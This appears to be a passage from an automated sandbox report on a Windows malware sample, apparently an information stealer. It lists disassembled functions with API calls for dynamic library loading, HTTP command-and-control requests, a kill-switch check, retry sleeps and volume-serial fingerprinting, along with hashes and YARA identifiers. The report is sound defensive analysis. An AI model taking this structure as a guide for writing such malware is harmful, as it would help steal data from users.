                                                        • API ID: AddressProc$LibraryLoad
                                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                                        • API String ID: 2238633743-1775429166
                                                        • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                        • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                                        • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                        • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52
                                                        Function 00419860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 671 419af4-419b08 GetProcAddress 668->671 672 419b0d-419b14 668->672 669->668 671->672 674 419b46-419b4d 672->674 675 419b16-419b41 GetProcAddress * 2 672->675 676 419b68-419b6f 674->676 677 419b4f-419b63 GetProcAddress 674->677 675->674 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                                        APIs
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA258), ref: 004198A1
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA228), ref: 004198BA
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA168), ref: 004198D2
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA2A0), ref: 004198EA
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA0F0), ref: 00419903
                                                        • GetProcAddress.KERNEL32(74DD0000,008266D8), ref: 0041991B
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8640), ref: 00419933
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8760), ref: 0041994C
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA000), ref: 00419964
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA150), ref: 0041997C
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA0D8), ref: 00419995
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA018), ref: 004199AD
                                                        • GetProcAddress.KERNEL32(74DD0000,007F84C0), ref: 004199C5
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA030), ref: 004199DE
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA180), ref: 004199F6
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8800), ref: 00419A0E
                                                        • GetProcAddress.KERNEL32(74DD0000,007F9FB8), ref: 00419A27
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA108), ref: 00419A3F
                                                        • GetProcAddress.KERNEL32(74DD0000,007F8620), ref: 00419A57
                                                        • GetProcAddress.KERNEL32(74DD0000,007FA0A8), ref: 00419A70
                                                        • GetProcAddress.KERNEL32(74DD0000,007F86E0), ref: 00419A88
                                                        • LoadLibraryA.KERNEL32(007F9FE8,?,00416A00), ref: 00419A9A
                                                        • LoadLibraryA.KERNEL32(007FA198,?,00416A00), ref: 00419AAB
                                                        • LoadLibraryA.KERNEL32(007FA048,?,00416A00), ref: 00419ABD
                                                        • LoadLibraryA.KERNEL32(007FA060,?,00416A00), ref: 00419ACF
                                                        • LoadLibraryA.KERNEL32(007FA1B0,?,00416A00), ref: 00419AE0
                                                        • GetProcAddress.KERNEL32(75A70000,007F9FD0), ref: 00419B02
                                                        • GetProcAddress.KERNEL32(75290000,007FA078), ref: 00419B23
                                                        • GetProcAddress.KERNEL32(75290000,007FA120), ref: 00419B3B
                                                        • GetProcAddress.KERNEL32(75BD0000,007FA210), ref: 00419B5D
                                                        • GetProcAddress.KERNEL32(75450000,007F8500), ref: 00419B7E
                                                        • GetProcAddress.KERNEL32(76E90000,00826808), ref: 00419B9F
                                                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419BB6
                                                        Strings
                                                        • NtQueryInformationProcess, xrefs: 00419BAA
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad
                                                        • String ID: NtQueryInformationProcess
                                                        • API String ID: 2238633743-2781105232
                                                        • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                        • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                                        • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                        • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12
                                                        Function 00404880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                                        • StrCmpCA.SHLWAPI(?,0082B8A0), ref: 0040493A
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                                        • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,0082B8D0), ref: 00404DE8
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                                        • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                                        • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                                        • HttpOpenRequestA.WININET(00000000,0082B8B0,?,0082B1A0,00000000,00000000,00400100,00000000), ref: 00404B15
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                        • String ID: "$"$------$------$------
                                                        • API String ID: 2402878923-2180234286
                                                        • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                        • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                                        • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                        • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                                        Function 00406280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1030 406528-40652d 1010->1030 1013 406348-40634c 1011->1013 1014 4064ff-406503 InternetCloseHandle 1011->1014 1016 40635a 1013->1016 1017 40634e-406358 1013->1017 1014->1010 1019 406364-406392 HttpOpenRequestA 1016->1019 1017->1019 1021 4064f5-4064f9 InternetCloseHandle 1019->1021 1022 406398-40639c 1019->1022 1021->1014 1024 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1022->1024 1025 40639e-4063bf InternetSetOptionA 1022->1025 1026 406407-406427 call 41a740 call 41a800 * 2 1024->1026 1027 40642c-40644b call 418940 1024->1027 1025->1024 1026->1030 1035 4064c9-4064e9 call 41a740 call 41a800 * 2 1027->1035 1036 40644d-406454 1027->1036 1035->1030 1039 406456-406480 InternetReadFile 1036->1039 1040 4064c7-4064ef InternetCloseHandle 1036->1040 1044 406482-406489 1039->1044 1045 40648b 1039->1045 1040->1021 1044->1045 1048 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1044->1048 1045->1040 1048->1039
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                        • StrCmpCA.SHLWAPI(?,0082B8A0), ref: 00406303
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                        • HttpOpenRequestA.WININET(00000000,GET,?,0082B1A0,00000000,00000000,00400100,00000000), ref: 00406385
                                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                                        • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                                        • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                                        • InternetCloseHandle.WININET(00000000), ref: 00406503
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                        • String ID: ERROR$ERROR$GET
                                                        • API String ID: 3074848878-2509457195
                                                        • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                        • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                                        • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                        • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56
                                                        Function 004117A0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1069 411817-41181a 1067->1069 1070 41199e-4119bd strtok_s 1067->1070 1072 411821-411830 call 41a820 1069->1072 1073 411849-411858 call 41a820 1069->1073 1074 4118ad-4118be StrCmpCA 1069->1074 1075 4118cf-4118e0 StrCmpCA 1069->1075 1076 41198f-411999 call 41a820 1069->1076 1077 4118f1-411902 StrCmpCA 1069->1077 1078 411951-411962 StrCmpCA 1069->1078 1079 411970-411981 StrCmpCA 1069->1079 1080 411913-411924 StrCmpCA 1069->1080 1081 411932-411943 StrCmpCA 1069->1081 1082 411835-411844 call 41a820 1069->1082 1083 41185d-41186e StrCmpCA 1069->1083 1084 41187f-411890 StrCmpCA 1069->1084 1070->1065 1072->1070 1073->1070 1105 4118c0-4118c3 1074->1105 1106 4118ca 1074->1106 1085 4118e2-4118e5 1075->1085 1086 4118ec 1075->1086 1076->1070 1087 411904-411907 1077->1087 1088 41190e 1077->1088 1093 411964-411967 1078->1093 1094 41196e 1078->1094 1096 411983-411986 1079->1096 1097 41198d 1079->1097 1089 411930 1080->1089 1090 411926-411929 1080->1090 1091 411945-411948 1081->1091 1092 41194f 1081->1092 1082->1070 1101 411870-411873 1083->1101 1102 41187a 1083->1102 1103 411892-41189c 1084->1103 1104 41189e-4118a1 1084->1104 1085->1086 1086->1070 1087->1088 1088->1070 1089->1070 1090->1089 1091->1092 1092->1070 1093->1094 1094->1070 1096->1097 1097->1070 1101->1102 1102->1070 1110 4118a8 1103->1110 1104->1110 1105->1106 1106->1070 1110->1070
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcessstrtok_s
                                                        • String ID: block
                                                        • API String ID: 3407564107-2199623458
                                                        • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                        • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                                        • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                        • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A
                                                        Function 00415510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1155 415693-4156a9 call 41aad0 StrCmpCA 1129->1155 1159 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1159 1145->1155 1160 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1155->1160 1161 4156af-4156b6 1155->1161 1159->1155 1291 415ac3-415ac6 1160->1291 1165 4157da-41585f call 41aad0 StrCmpCA 1161->1165 1166 4156bc-4156c3 1161->1166 1185 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1165->1185 1186 415865-41586c 1165->1186 1170 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1166->1170 1171 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1166->1171 1170->1165 1171->1165 1271 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1171->1271 1185->1291 1192 415872-415879 1186->1192 1193 41598f-415a14 call 41aad0 StrCmpCA 1186->1193 1200 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1192->1200 1201 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1192->1201 1222 415a16-415a21 Sleep 1193->1222 1223 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1193->1223 1200->1193 1296 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1200->1296 1201->1193 1222->1127 1223->1291 1271->1165 1296->1193
                                                        APIs
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008267A8,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                          • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                          • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                          • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                                          • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                                          • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                                        • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpylstrlen$Sleepstrtok
                                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                        • API String ID: 3630751533-2791005934
                                                        • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                        • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                                        • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                        • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA
                                                        Function 00417500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                                                        APIs
                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                                        • wsprintfA.USER32 ref: 00417640
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                        • String ID: :$C$\
                                                        • API String ID: 3790021787-3809124531
                                                        • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                        • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                                        • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                        • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9
                                                        Function 00B2003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
